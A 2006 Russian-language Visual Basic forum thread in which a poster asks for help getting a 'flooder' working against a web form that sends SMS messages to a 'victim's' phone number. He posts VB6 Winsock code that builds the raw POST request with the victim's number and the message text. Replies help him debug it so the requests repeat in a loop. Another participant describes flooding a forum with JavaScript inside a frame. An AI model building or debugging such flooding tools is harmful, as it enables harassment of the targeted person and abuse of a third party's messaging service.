Visual Basic, .NET, ASP, VBScript
 

   
   
     

Форум - Общий форум

Страница: 1 |

 

  Вопрос: Работа с пст пакотом В ВБ Добавлено: 22.03.06 13:36  

Автор вопроса:  Winux | Web-сайт: damagelab.org | ICQ: 11177222 
Короче говоря необходимо стправить на сервак пост. Ну тоесть есть веб форма, для которой надо написать флудер. Циклом мозги пудрить не стану, для начала надо наладить хотябы отправку, которая почему-то не пашет.

реализуем так:
param1 = "successPage=sendsuccess.html&MSISDN=%2B" & pref.text & victim.text & "&ctrycode=%2B" & pref.text & "&msisdn=" & victim.text & "&sender=Damagelab.Org&SMS=" & text.text

param = "POST http://host.com/purchase/action/pushtext HTTP/1.0" & vbCrLf & "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*" & vbCrLf & "Referer: http://host.com/text" & vbCrLf & "Accept-Language: ru" & vbCrLf & "Content-Type: application/x-www-form-urlencoded" & vbCrLf & "Proxy-Connection: Keep-Alive" & vbCrLf & "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" & vbCrLf & "Host: host.com" & vbCrLf & "Accept-Encoding: gzip,deflate" & vbCrLf & "Content-Length: " & Len(param1) & vbCrLf & vbCrLf & param1

Winsock1.Protocol = sckTCPProtocol
Winsock1.Connect hst, Val(prt) 'Соединяемся с серваком hst по порту prt
'Ждем коннекта
While Not Winsock1.State = 7
DoEvents
Wend
Winsock1.SendData (param) 'отсылаем
Winsock1.Close

Короче говоря чего то не хватает. Якобы надо ждать ответа сервака или еще что. Вообщем что не так?
Знаю лишь одно, http флудер где надо вписать хост порт и пакет все шлет на ура. Жаль исходников нет.

Ответить

  Ответы Всего ответов: 8  

Номер ответа: 1
Автор ответа:
 sne



Разработчик Offline Client

ICQ: 233286456 

Вопросов: 34
Ответов: 5445
 Web-сайт: hw.t-k.ru
 Профиль | | #1
Добавлено: 22.03.06 15:48
после отправки, получи ответ с кодом результата... да и адрес http://host.com/purchase/action/pushtext что-то мне не очень тут нравится...

Ответить

Номер ответа: 2
Автор ответа:
 Mihalыch



ICQ: 373-509-101 

Вопросов: 56
Ответов: 330
 Профиль | | #2 Добавлено: 22.03.06 15:57
А что не работает, ответ от сервера не приходит или данные не передаются. Вроде все верно. Единственное, я бы не захлапывал сразу Winsock после SendData, вроде нужно дождаться Winsock1.State = 8.

Ответить

Номер ответа: 3
Автор ответа:
 Winux



ICQ: 11177222 

Вопросов: 3
Ответов: 6
 Web-сайт: damagelab.org
 Профиль | | #3
Добавлено: 22.03.06 18:58
sne: а что с адресом (host.com я заменил. просто не хоче светить жертву)

Mihalыch: попробовал, толку мало.

После добавления цикла, отсылается 1 сообщение, независимо от кол-ва отправок. Т.е. если цикл повторяется 100 раз - приходит 1 сообение.

Ответить

Номер ответа: 4
Автор ответа:
 Mihalыch



ICQ: 373-509-101 

Вопросов: 56
Ответов: 330
 Профиль | | #4 Добавлено: 22.03.06 20:57
Вообще ждать коннекта лучше здесь
Private Sub Winsock1_Connect()

а завершения передачи здесь
Private Sub Winsock1_SendComplete()

а вообще все вроде верно, протокол думаю можно опустить, Winsock сам разберется.

Ответить

Номер ответа: 5
Автор ответа:
 Winux



ICQ: 11177222 

Вопросов: 3
Ответов: 6
 Web-сайт: damagelab.org
 Профиль | | #5
Добавлено: 23.03.06 00:58
Так, я короче в конец ничего не понимаю. Сообщение отсылается, НО только 1 хотя циклом задано 100. поему так может быть?

Ответить

Номер ответа: 6
Автор ответа:
 sne



Разработчик Offline Client

ICQ: 233286456 

Вопросов: 34
Ответов: 5445
 Web-сайт: hw.t-k.ru
 Профиль | | #6
Добавлено: 23.03.06 10:58
после отправки пакеты и выдачи тебе результата соединение автоматически закрывается сервером.

Ответить

Номер ответа: 7
Автор ответа:
 Winux



ICQ: 11177222 

Вопросов: 3
Ответов: 6
 Web-сайт: damagelab.org
 Профиль | | #7
Добавлено: 23.03.06 14:07
А если сделать соединение и его разрыв в цикле?

Ответить

Номер ответа: 8
Автор ответа:
 mc-black



ICQ: 308-534-060 

Вопросов: 20
Ответов: 1860
 Web-сайт: mc-black.narod.ru/dzp.htm
 Профиль | | #8
Добавлено: 23.03.06 15:04
Ну так вперед, что же мешает. Я делал как-то в разы проще (вот не знаю, со всеми форумами это проходит или нет..) Брал страничку форума с формой отправки, засовывал её целиком в один фрейм (я про html), в другой форме размещал скрипт на JavaScript и элементы управления флудом :) Всё.. Там тоже надо было дожидаться ответа сервера, иначе размещался только первый пост, с этим только надо было бороться. так что знайте, что всё нужное для флуда уже встроено в IE!

Кста, я не вредил посетителям форума. Так наше сообщество тогда избавилось от толпы народа, разместившего офтоповую тему и всячески ими подогревавшуюся, новыми посетителями из сети, пришедшими по поисковику. Форум был без авторизации, без админа, без правил и без ограничений. Форум замоминал что-то в пределах 100-500 постов, а остальное "забывал" навсегда :)

Ответить

Страница: 1 |

Поиск по форуму



© Copyright 2002-2011 VBNet.RU | Пишите нам